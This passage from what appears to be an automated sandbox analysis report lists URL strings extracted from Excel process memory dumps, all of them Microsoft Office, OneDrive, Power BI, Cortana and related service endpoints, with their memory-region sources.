      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.omex.office.net/appstate/querynt
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://api.cortana.ai
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://api.cortana.aip
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://api.diagnostics.office.com
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.com=
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnosticssdf.office.comU
      Source: EXCEL.EXE, 00000000.00000003.782352963.000000001314F000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://api.microsoftstream.com/api/
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://api.microsoftstream.com/api/nt3
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://api.office.net
      Source: EXCEL.EXE, 00000000.00000002.933997365.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782673322.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662745522.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787123980.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743580229.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807929408.000000001328A000.00000004.00000001.sdmpString found in binary or memory: https://api.office.net2G#
      Source: EXCEL.EXE, 00000000.00000002.933997365.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782673322.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662745522.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787123980.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743580229.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807929408.000000001328A000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netP
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netX
      Source: EXCEL.EXE, 00000000.00000002.933997365.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782673322.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662745522.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787123980.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743580229.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807929408.000000001328A000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netg
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://api.onedrive.com
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://api.onedrive.comce
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782352963.000000001314F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
      Source: EXCEL.EXE, 00000000.00000003.782352963.000000001314F000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups(
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://apis.live.net/v5.0/
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://apis.live.net/v5.0/l
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://augloop.office.com
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://augloop.office.com/v2
      Source: EXCEL.EXE, 00000000.00000003.662676214.00000000131FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743475425.00000000131FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.933897142.00000000131FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782512692.00000000131FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807834828.00000000131FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787064629.00000000131FC000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
      Source: EXCEL.EXE, 00000000.00000002.933997365.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782673322.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662745522.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787123980.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743580229.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807929408.000000001328A000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
      Source: EXCEL.EXE, 00000000.00000003.787102445.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807889222.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662721741.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.933958853.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782581219.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743536985.000000001325D000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://cdn.entity.
      Source: EXCEL.EXE, 00000000.00000003.787102445.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807889222.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662721741.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.933958853.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782581219.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743536985.000000001325D000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell6
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://clients.config.office.net/
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/j
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://config.edge.skype.com
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://config.edge.skype.com/config/v2/OfficeH
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://cortana.ai
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://cortana.ai/api
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://cortana.aiZ
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://cortana.aietlB
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://cr.office.com
      Source: EXCEL.EXE, 00000000.00000003.782352963.000000001314F000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filter
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://dataservice.o365filtering.com
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://dataservice.o365filtering.com/
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/:e
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/R
